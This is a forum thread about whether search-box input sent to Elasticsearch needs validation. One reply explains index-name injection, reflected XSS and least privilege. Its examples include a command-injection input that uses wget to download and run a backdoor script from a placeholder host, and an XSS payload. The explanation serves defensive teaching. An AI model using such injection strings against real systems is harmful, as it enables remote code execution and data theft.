Should I escape or validate query terms before using the es client?

Hy,
I'm trying out ES with a simple project. A web page with a search box (i.e., like Google) and a backend ES client sending the query terms to the search engine.

So I receive "XPTO" from the web form, and I use the ES client to query the index. I'm using the simplified query format.

Although "you shall validate the input" is the rule, I'm thinking I don't have to, because "XPTO" will be the input to the query, so the ES client should do the validation. Besides, my knowledge of ES is limited (as everyone else's), so ES would really be the one doing this kind of validation and escaping (if necessary).

Even if I change the analyzer, and allow more symbols that the standard one, I would not know what do escape. How would I do that?

I'm thinking also I should validade ES response, before showing it in the web page and escaping it for HTML and Javascript.

Am I missing some security concern here?
Thanks for your thoughts (and messages).

Short answer: Yes, you should probably do both input validation and output sanitization.

Input Validation

You should always assume there will be malicious users. The payload won't always by "XPTO". Depending on what client you use and how you use the user input in order to build your queries, there are attack vectors that can be dangerous. In the simplistic case that you want to allow access only to cesar_* indices, and that your web app takes the user input (i.e. "xpto") and uses this to feed to curl and make the request to get all documents of the cesar_xpto index

curl -uelastic:password -X GET "localhost:9200/index_{}/_search"

, the command will become

curl -uelastic:password  -X GET "localhost:9200/index_xpto/_search"

What happens if the user specifies xpto,.security as the input ? The request then becomes

curl -uelastic:password -X GET "localhost:9200/cesar_xpto,.security/_search"

and the user gets access to the documents of the internal security index. As said this is a very simplistic example and in this case a more interesting attack vector would be command injection ( i.e. an attacker using " && wget http://a.b.com/backdoor.py && chmod +x backdoor.py && ./backdoor.py as input ) but I just wanted to illustrate a possibility.

If you use i.e. the Java high level rest client to build your queries, you'll be much safer from injection attacks in the ES layer but your application might still be susceptible to other attack types. Also, you should think about DoS attacks where users might be able to run multiple consecutive expensive queries, causing CPU/memory starvation in your ES Cluster.

Output Sanitization

Elasticsearch will return JSON responses (i.e. with the HTTP Response header content-type: application/json; charset=UTF-8). That means that even if ES returns (reflects) back portions of the query - which it does in cases of an error - there is no danger for reflected XSS as there is no way the browser will interpret this as html. However, if you take the response and present it to the user in the context of a web app, then things change. For instance:

curl -uelastic:password  -X GET 'localhost:9200/something<img%20src=x%20onerror=alert(1))>'

will get the following response from Elasticsearch

{"error":{"root_cause":[{"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1))>","index":"something<img src=x onerror=alert(1))>"}],"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1))>","index":"something<img src=x onerror=alert(1))>"},"status":404}

Now if you take this and put it as is in the response page of your web app without escaping it, the <img src=x onerror=alert(1))> part will trigger and will be executed in the user's browser. Again, just an example.

Least Privilege Principle

Another thing worth noting is that you should not run all the queries as a superuser( i.e. the elastic user) . Figure out the least privileges your users will need and create a role that has these privileges, assign the role to a service account user and use that to make the requests to Elasticsearch via the client. This way, even if a user finds a way to trick your application logic, the impact that it can have on your elasticsearch cluster will be contained.

Hope this helps

Hy ikakavas! Thanks for the detailed answer!

In fact I'm using the high level Python client : https://elasticsearch-dsl.readthedocs.io/en/latest/

But I think I face the same concerns as with the Java one.

So, the next logic question is: what should I escape, as I didn't find documentation about that in the client's doc. The DOS attack is easier to deal with as is not ES specific. However, escaping is. And how would that change if I change the default analyzer(allowing some special characters in the database and in the queries)? Is there some guidelines or documentation about input validation, or escaping I could follow?

Thanks in advance.

Anyone knows about this documentation?

Or does it depend on the analyzer?

Bump

This topic was automatically closed 28 days after the last reply. New replies are no longer allowed.